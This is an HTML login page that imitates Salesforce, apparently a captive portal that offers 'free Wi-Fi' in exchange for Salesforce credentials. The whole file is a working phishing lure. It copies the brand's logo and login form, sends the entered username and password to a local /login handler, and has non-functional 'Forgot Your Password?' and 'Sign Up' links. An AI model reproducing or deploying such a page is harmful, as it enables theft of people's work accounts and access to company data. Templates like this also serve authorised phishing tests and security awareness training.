<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Salesforce Login</title>
    <link rel="stylesheet" href="../static/css/styles.css">
</head>
<body>
    <div class="login-container">
        <div class="logo">
            <img src="../static/img/logo214.svg" alt="Salesforce Logo">
        </div>
        <h1>Log In to your Salesforce Account for free Wi-Fi!</h1>
        <form method="POST" action="/login">
            <div class="form-group">
                <label for="username">Username</label>
                <input type="text" id="login" name="login" required>
            </div>
            <div class="form-group">
                <label for="password">Password</label>
                <input type="password" id="password" name="password" required>
            </div>
            <div class="form-group">
                <input type="submit" value="Log In">
            </div>
        </form>
        <div class="links">
            <a>Forgot Your Password?</a>
        </div>
        <p>New to Salesforce? <a>Sign Up</a></p>
    </div>
</body>
</html>
